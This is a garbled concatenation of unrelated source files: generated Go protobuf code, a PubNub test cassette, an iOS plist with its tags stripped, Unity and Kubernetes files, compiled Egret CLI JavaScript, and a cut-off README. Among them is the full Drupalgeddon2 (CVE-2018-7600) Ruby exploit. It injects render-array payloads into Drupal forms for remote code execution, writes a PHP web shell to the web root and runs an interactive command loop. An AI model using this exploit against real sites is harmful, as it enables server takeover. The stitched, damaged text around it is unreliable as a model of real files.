Java.\n//\n// Foo foo = ...;\n// Any any = Any.pack(foo);\n// ...\n// if (any.is(Foo.class)) {\n// foo = any.unpack(Foo.class);\n// }\n//\n// Example 3: Pack and unpack a message in Python.\n//\n// foo = Foo(...)\n// any = Any()\n// any.Pack(foo)\n// ...\n// if any.Is(Foo.DESCRIPTOR):\n// any.Unpack(foo)\n// ...\n//\n// Example 4: Pack and unpack a message in Go\n//\n// foo := &pb.Foo{...}\n// any, err := ptypes.MarshalAny(foo)\n// ...\n// foo := &pb.Foo{}\n// if err := ptypes.UnmarshalAny(any, foo); err != nil {\n// ...\n// }\n//\n// The pack methods provided by protobuf library will by default use\n// 'type.googleapis.com/full.type.name' as the type URL and the unpack\n// methods only use the fully qualified type name after the last '/'\n// in the type URL, for example \"foo.bar.com/x/y.z\" will yield type\n// name \"y.z\".\n//\n//\n// JSON\n// ====\n// The JSON representation of an `Any` value uses the regular\n// representation of the deserialized, embedded message, with an\n// additional field `@type` which contains the type URL. Example:\n//\n// package google.profile;\n// message Person {\n// string first_name = 1;\n// string last_name = 2;\n// }\n//\n// {\n// \"@type\": \"type.googleapis.com/google.profile.Person\",\n// \"firstName\": ,\n// \"lastName\": \n// }\n//\n// If the embedded message type is well-known and has a custom JSON\n// representation, that representation will be embedded adding a field\n// `value` which holds the custom JSON in addition to the `@type`\n// field. Example (for message [google.protobuf.Duration][]):\n//\n// {\n// \"@type\": \"type.googleapis.com/google.protobuf.Duration\",\n// \"value\": \"1.212s\"\n// }\n//\ntype Any struct {\n\t// A URL/resource name whose content describes the type of the\n\t// serialized protocol buffer message.\n\t//\n\t// For URLs which use the scheme `http`, `https`, or no scheme, the\n\t// following restrictions and interpretations apply:\n\t//\n\t// * If no scheme is provided, `https` is assumed.\n\t// * The last segment of the URL's path must represent the fully\n\t// qualified name of the type (as in `path/google.protobuf.Duration`).\n\t// The name should be in a canonical form (e.g., leading \".\" is\n\t// not accepted).\n\t// * An HTTP GET on the URL must yield a [google.protobuf.Type][]\n\t// value in binary format, or produce an error.\n\t// * Applications are allowed to cache lookup results based on the\n\t// URL, or have them precompiled into a binary to avoid any\n\t// lookup. Therefore, binary compatibility needs to be preserved\n\t// on changes to types. (Use versioned type names to manage\n\t// breaking changes.)\n\t//\n\t// Schemes other than `http`, `https` (or the empty scheme) might be\n\t// used with implementation specific semantics.\n\t//\n\tTypeUrl string `protobuf:\"bytes,1,opt,name=type_url,json=typeUrl,proto3\" json:\"type_url,omitempty\"`\n\t// Must be a valid serialized protocol buffer of the above specified type.\n\tValue []byte `protobuf:\"bytes,2,opt,name=value,proto3\" json:\"value,omitempty\"`\n\tXXX_NoUnkeyedLiteral struct{} `json:\"-\"`\n\tXXX_unrecognized []byte `json:\"-\"`\n\tXXX_sizecache int32 `json:\"-\"`\n}\n\nfunc (m *Any) Reset() { *m = Any{} }\nfunc (m *Any) String() string { return proto.CompactTextString(m) }\nfunc (*Any) ProtoMessage() {}\nfunc (*Any) Descriptor() ([]byte, []int) {\n\treturn fileDescriptor_any_744b9ca530f228db, []int{0}\n}\nfunc (*Any) XXX_WellKnownType() string { return \"Any\" }\nfunc (m *Any) XXX_Unmarshal(b []byte) error {\n\treturn xxx_messageInfo_Any.Unmarshal(m, b)\n}\nfunc (m *Any) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {\n\treturn xxx_messageInfo_Any.Marshal(b, m, deterministic)\n}\nfunc (dst *Any) XXX_Merge(src proto.Message) {\n\txxx_messageInfo_Any.Merge(dst, src)\n}\nfunc (m *Any) XXX_Size() int {\n\treturn xxx_messageInfo_Any.Size(m)\n}\nfunc (m *Any) XXX_DiscardUnknown() {\n\txxx_messageInfo_Any.DiscardUnknown(m)\n}\n\nvar xxx_messageInfo_Any proto.InternalMessageInfo\n\nfunc (m *Any) GetTypeUrl() string {\n\tif m != nil {\n\t\treturn m.TypeUrl\n\t}\n\treturn \"\"\n}\n\nfunc (m *Any) GetValue() []byte {\n\tif m != nil {\n\t\treturn m.Value\n\t}\n\treturn nil\n}\n\nfunc init() {\n\tproto.RegisterType((*Any)(nil), \"google.protobuf.Any\")\n}\n\nfunc init() { proto.RegisterFile(\"google/protobuf/any.proto\", fileDescriptor_any_744b9ca530f228db) }\n\nvar fileDescriptor_any_744b9ca530f228db = []byte{\n\t// 185 bytes of a gzipped FileDescriptorProto\n\t0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xe2, 0x92, 0x4c, 0xcf, 0xcf, 0x4f,\n\t0xcf, 0x49, 0xd5, 0x2f, 0x28, 0xca, 0x2f, 0xc9, 0x4f, 0x2a, 0x4d, 0xd3, 0x4f, 0xcc, 0xab, 0xd4,\n\t0x03, 0x73, 0x84, 0xf8, 0x21, 0x52, 0x7a, 0x30, 0x29, 0x25, 0x33, 0x2e, 0x66, 0xc7, 0xbc, 0x4a,\n\t0x21, 0x49, 0x2e, 0x8e, 0x92, 0xca, 0x82, 0xd4, 0xf8, 0xd2, 0xa2, 0x1c, 0x09, 0x46, 0x05, 0x46,\n\t0x0d, 0xce, 0x20, 0x76, 0x10, 0x3f, 0xb4, 0x28, 0x47, 0x48, 0x84, 0x8b, 0xb5, 0x2c, 0x31, 0xa7,\n\t0x34, 0x55, 0x82, 0x49, 0x81, 0x51, 0x83, 0x27, 0x08, 0xc2, 0x71, 0xca, 0xe7, 0x12, 0x4e, 0xce,\n\t0xcf, 0xd5, 0x43, 0x33, 0xce, 0x89, 0xc3, 0x31, 0xaf, 0x32, 0x00, 0xc4, 0x09, 0x60, 0x8c, 0x52,\n\t0x4d, 0xcf, 0x2c, 0xc9, 0x28, 0x4d, 0xd2, 0x4b, 0xce, 0xcf, 0xd5, 0x4f, 0xcf, 0xcf, 0x49, 0xcc,\n\t0x4b, 0x47, 0xb8, 0xa8, 0x00, 0x64, 0x7a, 0x31, 0xc8, 0x61, 0x8b, 0x98, 0x98, 0xdd, 0x03, 0x9c,\n\t0x56, 0x31, 0xc9, 0xb9, 0x43, 0x8c, 0x0a, 0x80, 0x2a, 0xd1, 0x0b, 0x4f, 0xcd, 0xc9, 0xf1, 0xce,\n\t0xcb, 0x2f, 0xcf, 0x0b, 0x01, 0x29, 0x4d, 0x62, 0x03, 0xeb, 0x35, 0x06, 0x04, 0x00, 0x00, 0xff,\n\t0xff, 0x13, 0xf8, 0xe8, 0x42, 0xdd, 0x00, 0x00, 0x00,\n}\n"} {"text": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\n\n\n# Settings - Proxy information (nil to disable)\nproxy_addr = nil\nproxy_port = 8080\n\n\n# Settings - General\n$useragent = \"drupalgeddon2\"\nwebshell = \"s.php\"\nwriteshell = true\n\n\n# Settings - Payload (we could just be happy without this, but we can do better!)\n#bashcmd = \"'\nbashcmd = \"&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_post [post]\ndef http_post(url, payload=\"\")\n uri = URI(url)\n request = Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.body = payload\n return $http.request(request)\nend\n\n\n# Function gen_evil_url \ndef gen_evil_url(evil, feedback=true)\n # PHP function to use (don't forget about disabled functions...)\n phpmethod = $drupalverion.start_with?('8')? \"exec\" : \"passthru\"\n\n #puts \"[*] PHP cmd: #{phpmethod}\" if feedback\n puts \"[*] Payload: #{evil}\" if feedback\n\n ## Check the version to match the payload\n # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n if $drupalverion.start_with?('8')\n # Method #1 - Drupal 8, mail, #post_render - response is 200\n url = $target + \"user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpmethod + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)\n #url = $target + \"user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n #payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=\" + evil\n elsif $drupalverion.start_with?('7')\n # Method #3 - Drupal 7, name, #post_render - response is 200\n url = $target + \"?q=user/password&name[%23post_render][]=\" + phpmethod + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n else\n puts \"[!] Unsupported Drupal version\"\n exit\n end\n\n # Drupal v7 needs an extra value from a form\n if $drupalverion.start_with?('7')\n response = http_post(url, payload)\n\n form_build_id = response.body.match(/input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\"/).to_s().slice(/value=\"(.*)\"/, 1).to_s.strip\n puts \"[!] WARNING: Didn't detect form_build_id\" if form_build_id.empty?\n\n #url = $target + \"file/ajax/name/%23value/\" + form_build_id\n url = $target + \"?q=file/ajax/name/%23value/\" + form_build_id\n payload = \"form_build_id=\" + form_build_id\n end\n\n return url, payload\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Quick how to use\nif ARGV.empty?\n puts \"Usage: ruby drupalggedon2.rb \"\n puts \" ruby drupalgeddon2.rb https://example.com\"\n exit\nend\n# Read in values\n$target = ARGV[0]\n\n\n# Check input for protocol\nif not $target.start_with?('http')\n $target = \"http://#{$target}\"\nend\n# Check input for the end\nif not $target.end_with?('/')\n $target += \"/\"\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs \"[*] --==[::#Drupalggedon2::]==--\"\nputs \"-\"*80\nputs \"[*] Target : #{$target}\"\nputs \"[*] Write? : Skipping writing web shell\" if not writeshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)\n\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = nil\n# Possible URLs\nurl = [\n $target + \"CHANGELOG.txt\",\n $target + \"core/CHANGELOG.txt\",\n $target + \"includes/bootstrap.inc\",\n $target + \"core/includes/bootstrap.inc\",\n]\n# Check all\nurl.each do|uri|\n # Check response\n response = http_post(uri)\n\n if response.code == \"200\"\n puts \"[+] Found : #{uri} (#{response.code})\"\n\n # Patched already?\n puts \"[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\" if response.body.include? \"SA-CORE-2018-002\"\n\n # Try and get version from the file contents\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # If not, try and get it from the URL\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\" if $drupalverion.empty?\n\n # Done!\n break\n elsif response.code == \"403\"\n puts \"[+] Found : #{uri} (#{response.code})\"\n\n # Get version from URL\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\"\n else\n puts \"[!] MISSING: #{uri} (#{response.code})\"\n end\nend\n\n\n# Feedback\nif $drupalverion\n status = $drupalverion.end_with?('x')? \"?\" : \"!\"\n puts \"[+] Drupal#{status}: #{$drupalverion}\"\nelse\n puts \"[!] Didn't detect Drupal version\"\n puts \"[!] Forcing Drupal v8.x attack\"\n $drupalverion = \"8.x\"\nend\nputs \"-\"*80\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# Make a request, testing code execution\nputs \"[*] Testing: Code Execution\"\n# Generate a random string to see if we can echo it\nrandom = (0...8).map { (65 + rand(26)).chr }.join\nurl, payload = gen_evil_url(\"echo #{random}\")\nresponse = http_post(url, payload)\nif response.code == \"200\" and not response.body.empty?\n #result = JSON.pretty_generate(JSON[response.body])\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\n puts \"[+] Result : #{result}\"\n\n puts response.body.match(/#{random}/)? \"[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\" : \"[+] Target might to be exploitable?\"\nelse\n puts \"[!] Target is NOT exploitable ~ HTTP Response: #{response.code}\"\n exit\nend\nputs \"-\"*80\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = nil\nprompt = \"drupalgeddon2\"\n# Possibles paths to try\npaths = [\n \"./\",\n \"./sites/default/\",\n \"./sites/default/files/\",\n]\n# Check all\npaths.each do|path|\n puts \"[*] Testing: File Write To Web Root (#{path})\"\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd)\n # Make the request\n response = http_post(url, payload)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n #result = JSON.pretty_generate(JSON[response.body])\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\n puts \"[+] Result : #{result}\"\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_post(\"#{$target}#{webshellpath}\", \"c=hostname\")\n if response.code == \"200\" and not response.body.empty?\n puts \"[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\"\n break\n else\n puts \"[!] Target is NOT exploitable. No write access here!\"\n end\n else\n puts \"[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}\"\n end\n webshellpath = nil\nend if writeshell\nputs \"-\"*80 if writeshell\n\nif webshellpath\n # Get hostname for the prompt\n prompt = response.body.to_s.strip\n\n # Feedback\n puts \"[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'\"\nelsif writeshell\n puts \"[!] FAILED: Coudn't find writeable web path\"\n puts \"[*] Dropping back direct commands (expect an ugly shell!)\"\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"ERROR\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Exit\n break if command =~ /exit/\n\n # Blank link?\n next if command.empty?\n\n # If PHP shell\n if webshellpath\n # Send request\n result = http_post(\"#{$target}#{webshell}\", \"c=#{command}\").body\n # Direct commands\n else\n url, payload = gen_evil_url(command, false)\n response = http_post(url, payload)\n if response.code == \"200\" and not response.body.empty?\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\n end\n end\n\n # Feedback\n puts result\nend\n"} {"text": "---\nhttp_interactions:\n- request:\n method: get\n uri: http://ps.pndsn.com/v2/auth/audit/sub-key/sub-a-mock-key?auth=key&channel=demo&pnsdk=PubNub-Ruby/4.1.0&signature=zxDcoxKlyAvaeNvZ-W8i5DfEyQd2n_F-xrZtRbBAy4I=×tamp=1464187176&uuid=ruby-test-uuid-client-one\n body:\n encoding: UTF-8\n string: ''\n headers:\n User-Agent:\n - HTTPClient/1.0 (2.8.0, ruby 2.3.0 (2015-12-25))\n Accept:\n - \"*/*\"\n Date:\n - Wed, 25 May 2016 14:39:36 GMT\n response:\n status:\n code: 200\n message: OK\n headers:\n Date:\n - Wed, 25 May 2016 14:39:36 GMT\n Content-Type:\n - text/javascript; charset=UTF-8\n Content-Length:\n - '177'\n Connection:\n - keep-alive\n Access-Control-Allow-Origin:\n - \"*\"\n Access-Control-Allow-Methods:\n - GET\n Access-Control-Allow-Headers:\n - Origin, X-Requested-With, Content-Type, Accept\n Cache-Control:\n - no-cache, no-store, must-revalidate\n body:\n encoding: UTF-8\n string: '{\"message\":\"Success\",\"payload\":{\"level\":\"user\",\"subscribe_key\":\"sub-a-mock-key\",\"channel\":\"demo\",\"auths\":{}},\"service\":\"Access\n Manager\",\"status\":200}'\n http_version: \n recorded_at: Wed, 25 May 2016 14:39:36 GMT\nrecorded_with: VCR 3.0.1\n"} {"text": "\n\n\n\n\tCFBundleDevelopmentRegion\n\ten\n\tCFBundleExecutable\n\t$(EXECUTABLE_NAME)\n\tCFBundleIdentifier\n\torg.reactjs.native.example.$(PRODUCT_NAME:rfc1034identifier)\n\tCFBundleInfoDictionaryVersion\n\t6.0\n\tCFBundleName\n\t$(PRODUCT_NAME)\n\tCFBundlePackageType\n\tAPPL\n\tCFBundleShortVersionString\n\t1.0\n\tCFBundleSignature\n\t????\n\tCFBundleVersion\n\t1\n\tLSRequiresIPhoneOS\n\t\n\tUILaunchStoryboardName\n\tLaunchScreen\n\tUIRequiredDeviceCapabilities\n\t\n\t\tarmv7\n\t\n\tUISupportedInterfaceOrientations\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\tUIInterfaceOrientationLandscapeLeft\n\t\tUIInterfaceOrientationLandscapeRight\n\t\n\tUIViewControllerBasedStatusBarAppearance\n\t\n\tNSLocationWhenInUseUsageDescription\n\t\n\tNSAppTransportSecurity\n\t\n\t\n\t\tNSExceptionDomains\n\t\t\n\t\t\tlocalhost\n\t\t\t\n\t\t\t\tNSExceptionAllowsInsecureHTTPLoads\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\n\n"} {"text": "fileFormatVersion: 2\nguid: 0c15cb71ab56d4ee484fa0952ffaf36b\ntimeCreated: 1465222832\nlicenseType: Free\nTrueTypeFontImporter:\n serializedVersion: 3\n fontSize: 16\n forceTextureCase: -2\n characterSpacing: 1\n characterPadding: 0\n includeFontData: 1\n fontNames: []\n fallbackFontReferences: []\n customCharacters: \n fontRenderingMode: 0\n ascentCalculationMode: 1\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/// \nvar __decorate = (this && this.__decorate) || function (decorators, target, key, desc) {\n var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;\n if (typeof Reflect === \"object\" && typeof Reflect.decorate === \"function\") r = Reflect.decorate(decorators, target, key, desc);\n else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? d(target, key, r) : d(target, key)) || r;\n return c > 3 && r && Object.defineProperty(target, key, r), r;\n};\nvar __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {\n return new (P || (P = Promise))(function (resolve, reject) {\n function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }\n function rejected(value) { try { step(generator[\"throw\"](value)); } catch (e) { reject(e); } }\n function step(result) { result.done ? resolve(result.value) : new P(function (resolve) { resolve(result.value); }).then(fulfilled, rejected); }\n step((generator = generator.apply(thisArg, _arguments || [])).next());\n });\n};\nvar __generator = (this && this.__generator) || function (thisArg, body) {\n var _ = { label: 0, sent: function() { if (t[0] & 1) throw t[1]; return t[1]; }, trys: [], ops: [] }, f, y, t, g;\n return g = { next: verb(0), \"throw\": verb(1), \"return\": verb(2) }, typeof Symbol === \"function\" && (g[Symbol.iterator] = function() { return this; }), g;\n function verb(n) { return function (v) { return step([n, v]); }; }\n function step(op) {\n if (f) throw new TypeError(\"Generator is already executing.\");\n while (_) try {\n if (f = 1, y && (t = y[op[0] & 2 ? \"return\" : op[0] ? \"throw\" : \"next\"]) && !(t = t.call(y, op[1])).done) return t;\n if (y = 0, t) op = [0, t.value];\n switch (op[0]) {\n case 0: case 1: t = op; break;\n case 4: _.label++; return { value: op[1], done: false };\n case 5: _.label++; y = op[1]; op = [0]; continue;\n case 7: op = _.ops.pop(); _.trys.pop(); continue;\n default:\n if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) { _ = 0; continue; }\n if (op[0] === 3 && (!t || (op[1] > t[0] && op[1] < t[3]))) { _.label = op[1]; break; }\n if (op[0] === 6 && _.label < t[1]) { _.label = t[1]; t = op; break; }\n if (t && _.label < t[2]) { _.label = t[2]; _.ops.push(op); break; }\n if (t[2]) _.ops.pop();\n _.trys.pop(); continue;\n }\n op = body.call(thisArg, _);\n } catch (e) { op = [6, e]; y = 0; } finally { f = t = 0; }\n if (op[0] & 5) throw op[1]; return { value: op[0] ? op[1] : void 0, done: true };\n }\n};\nvar utils = require(\"../lib/utils\");\n// import fileUtil = require('../lib/FileUtil');\nvar watch = require(\"../lib/watch\");\nvar path = require(\"path\");\nvar Build = require(\"./build\");\nvar Server = require(\"../server/server\");\nvar FileUtil = require(\"../lib/FileUtil\");\nvar service = require(\"../service/index\");\nvar os = require(\"os\");\nvar Run = /** @class */ (function () {\n function Run() {\n this.initVersion = \"\"; //初始化的 egret 版本,如果版本变化了,关掉当前的进程\n }\n Run.prototype.execute = function () {\n return __awaiter(this, void 0, void 0, function () {\n var exitCode, target, _a, port;\n return __generator(this, function (_b) {\n switch (_b.label) {\n case 0: return [4 /*yield*/, new Build().execute()];\n case 1:\n exitCode = _b.sent();\n target = egret.args.target;\n _a = target;\n switch (_a) {\n case \"web\": return [3 /*break*/, 2];\n case \"wxgame\": return [3 /*break*/, 4];\n case 'bricks': return [3 /*break*/, 6];\n }\n return [3 /*break*/, 8];\n case 2: return [4 /*yield*/, utils.getAvailablePort(egret.args.port)];\n case 3:\n port = _b.sent();\n this.initServer(port);\n return [2 /*return*/, DontExitCode];\n case 4: return [4 /*yield*/, runWxIde()];\n case 5: return [2 /*return*/, (_b.sent())];\n case 6: return [4 /*yield*/, runBricks()];\n case 7: return [2 /*return*/, (_b.sent())];\n case 8: return [2 /*return*/];\n }\n });\n });\n };\n Run.prototype.initServer = function (port) {\n egret.args.port = port;\n var addresses = utils.getNetworkAddress();\n if (addresses.length > 0) {\n egret.args.host = addresses[0];\n }\n var openWithBrowser = !egret.args.serverOnly;\n var server = new Server();\n var projectDir = egret.args.projectDir;\n server.use(Server.fileReader(projectDir));\n server.start(projectDir, port, this.wrapByParams(egret.args.startUrl), openWithBrowser);\n if (egret.args.serverOnly) {\n console.log(\"Url:\" + this.wrapByParams(egret.args.startUrl));\n }\n else {\n console.log('\\n');\n console.log(\" \" + utils.tr(10013, ''));\n console.log('\\n');\n console.log(' ' + this.wrapByParams(egret.args.startUrl));\n for (var i = 1; i < addresses.length; i++) {\n console.log(' ' + this.wrapByParams(egret.args.getStartURL(addresses[i])));\n }\n console.log('\\n');\n }\n if (egret.args.autoCompile) {\n console.log(' ' + utils.tr(10010));\n this.watchFiles(egret.args.srcDir);\n //this.watchFiles(egret.args.templateDir);\n }\n else if (!egret.args.serverOnly) {\n console.log(' ' + utils.tr(10012));\n }\n };\n Run.prototype.watchFiles = function (dir) {\n var _this = this;\n watch.createMonitor(dir, { persistent: true, interval: 2007, filter: function (f, stat) { return !f.match(/\\.g(\\.d)?\\.ts/); } }, function (m) {\n m.on(\"created\", function (f) { return _this.sendBuildCMD(f, \"added\"); })\n .on(\"removed\", function (f) { return _this.sendBuildCMD(f, \"removed\"); })\n .on(\"changed\", function (f) { return _this.sendBuildCMD(f, \"modified\"); });\n });\n watch.createMonitor(path.dirname(dir), {\n persistent: true, interval: 2007, filter: function (f, stat) {\n if (path.basename(f) == \"egretProperties.json\" || path.basename(f) == \"tsconfig.json\") {\n return true;\n }\n else {\n return false;\n }\n }\n }, function (m) {\n m.on(\"created\", function (f) { return _this.shutDown(f, \"added\"); })\n .on(\"removed\", function (f) { return _this.shutDown(f, \"removed\"); })\n .on(\"changed\", function (f) { return _this.shutDown(f, \"modified\"); });\n });\n };\n Run.prototype.shutDown = function (file, type) {\n globals.log(10022, file);\n service.client.execCommand({\n path: egret.args.projectDir,\n command: \"shutdown\",\n option: egret.args\n }, function () { return process.exit(0); }, true);\n };\n Run.prototype.sendBuildCMD = function (file, type) {\n file = FileUtil.escapePath(file);\n egret.args[type] = [file];\n service.client.execCommand({ command: \"build\", path: egret.args.projectDir, option: egret.args }, function (cmd) {\n if (!cmd.exitCode)\n console.log(' ' + utils.tr(10011));\n else\n console.log(' ' + utils.tr(10014), cmd.exitCode);\n if (cmd.messages) {\n cmd.messages.forEach(function (m) { return console.log(m); });\n }\n });\n };\n Run.prototype.wrapByParams = function (url) {\n return url + this.genParams();\n };\n Run.prototype.genParams = function () {\n var result = \"\";\n var propertyFilePath = FileUtil.joinPath(egret.args.projectDir, \"egretProperties.json\");\n if (FileUtil.exists(propertyFilePath)) {\n var urlParams = JSON.parse(FileUtil.read(propertyFilePath)).urlParams;\n if (urlParams) {\n var hasParams = false;\n for (var key in urlParams) {\n hasParams = true;\n result += key + \"=\" + urlParams[key] + \"&\";\n }\n if (hasParams) {\n result = \"?\" + result.substr(0, result.length - 1);\n }\n }\n }\n return result;\n };\n __decorate([\n utils.cache\n ], Run.prototype, \"genParams\", null);\n return Run;\n}());\nfunction runWxIde() {\n return __awaiter(this, void 0, void 0, function () {\n var wxPaths, _a, result, stdout_1, iconv, encoding, binaryEncoding, result2, stdout, stdoutArr, exePath, wxpath, projectPath, e_1;\n return __generator(this, function (_b) {\n switch (_b.label) {\n case 0:\n wxPaths = [];\n _a = os.platform();\n switch (_a) {\n case \"darwin\": return [3 /*break*/, 1];\n case \"win32\": return [3 /*break*/, 3];\n }\n return [3 /*break*/, 5];\n case 1: return [4 /*yield*/, utils.executeCommand(\"defaults read com.tencent.wechat.devtools LastRunAppBundlePath\")];\n case 2:\n result = _b.sent();\n if (result.stdout != '') {\n stdout_1 = result.stdout.replace(/\\n/g, \"\");\n wxPaths = [FileUtil.joinPath(stdout_1, \"/Contents/Resources/app.nw/bin/cli\")];\n }\n // defaults read\n wxPaths.push(\"/Applications/wechatwebdevtools.app/Contents/Resources/app.nw/bin/cli\");\n return [3 /*break*/, 5];\n case 3:\n // defaults read\n wxPaths = [\n \"C:\\\\Program Files (x86)\\\\Tencent\\\\微信web开发者工具\\\\cli.bat\",\n \"C:\\\\Program Files\\\\Tencent\\\\微信web开发者工具\\\\cli.bat\"\n ];\n iconv = require('../lib/iconv-lite');\n encoding = 'cp936';\n binaryEncoding = 'binary';\n return [4 /*yield*/, utils.executeCommand('REG QUERY \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Tencent\\\\微信web开发者工具\"', { encoding: binaryEncoding })];\n case 4:\n result2 = _b.sent();\n stdout = iconv.decode(new Buffer(result2.stdout, binaryEncoding), encoding);\n if (stdout != '') {\n stdoutArr = stdout.split(\"\\r\\n\");\n exePath = stdoutArr.find(function (path) { return path.indexOf(\".exe\") != -1; });\n exePath = exePath.split(\" \").find(function (path) { return path.indexOf(\".exe\") != -1; });\n exePath = path.join(path.dirname(exePath), 'cli.bat');\n wxPaths.unshift(exePath);\n }\n return [3 /*break*/, 5];\n case 5:\n wxpath = wxPaths.find(function (wxpath) { return FileUtil.exists(wxpath); });\n if (!wxpath) return [3 /*break*/, 11];\n projectPath = egret.args.projectDir;\n projectPath = path.resolve(projectPath, \"../\", path.basename(projectPath) + \"_wxgame\");\n _b.label = 6;\n case 6:\n _b.trys.push([6, 8, , 10]);\n return [4 /*yield*/, utils.shell(wxpath, [\"-o\", projectPath, \"-f\", \"egret\"], null, true)];\n case 7:\n _b.sent();\n return [3 /*break*/, 10];\n case 8:\n e_1 = _b.sent();\n return [4 /*yield*/, utils.shell(wxpath, [\"-o\", projectPath], null, true)];\n case 9:\n _b.sent();\n return [3 /*break*/, 10];\n case 10: return [3 /*break*/, 12];\n case 11: throw '请安装最新微信开发者工具';\n case 12: return [2 /*return*/, DontExitCode];\n }\n });\n });\n}\nfunction runBricks() {\n return __awaiter(this, void 0, void 0, function () {\n var projectPath;\n return __generator(this, function (_a) {\n switch (os.platform()) {\n case \"darwin\":\n projectPath = egret.args.projectDir;\n projectPath = path.resolve(projectPath, \"../\", path.basename(projectPath) + \"_bricks\", \"PublicBrickEngineGame.xcodeproj\");\n utils.open(projectPath);\n return [2 /*return*/, 0];\n break;\n case \"win32\":\n throw '目前玩一玩仅支持 MacOS 平台开发';\n break;\n }\n return [2 /*return*/, 1];\n });\n });\n}\nmodule.exports = Run;\n"} {"text": "/*\nCopyright 2017 The Kubernetes Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\npackage v1beta1\n\nimport \"k8s.io/apimachinery/pkg/runtime\"\n\nfunc addDefaultingFuncs(scheme *runtime.Scheme) error {\n\tRegisterDefaults(scheme)\n\treturn scheme.AddDefaultingFuncs(\n\t\tSetDefaults_CertificateSigningRequestSpec,\n\t)\n}\nfunc SetDefaults_CertificateSigningRequestSpec(obj *CertificateSigningRequestSpec) {\n\tif obj.Usages == nil {\n\t\tobj.Usages = []KeyUsage{UsageDigitalSignature, UsageKeyEncipherment}\n\t}\n}\n"} {"text": "cli\n===\n\n[![Build 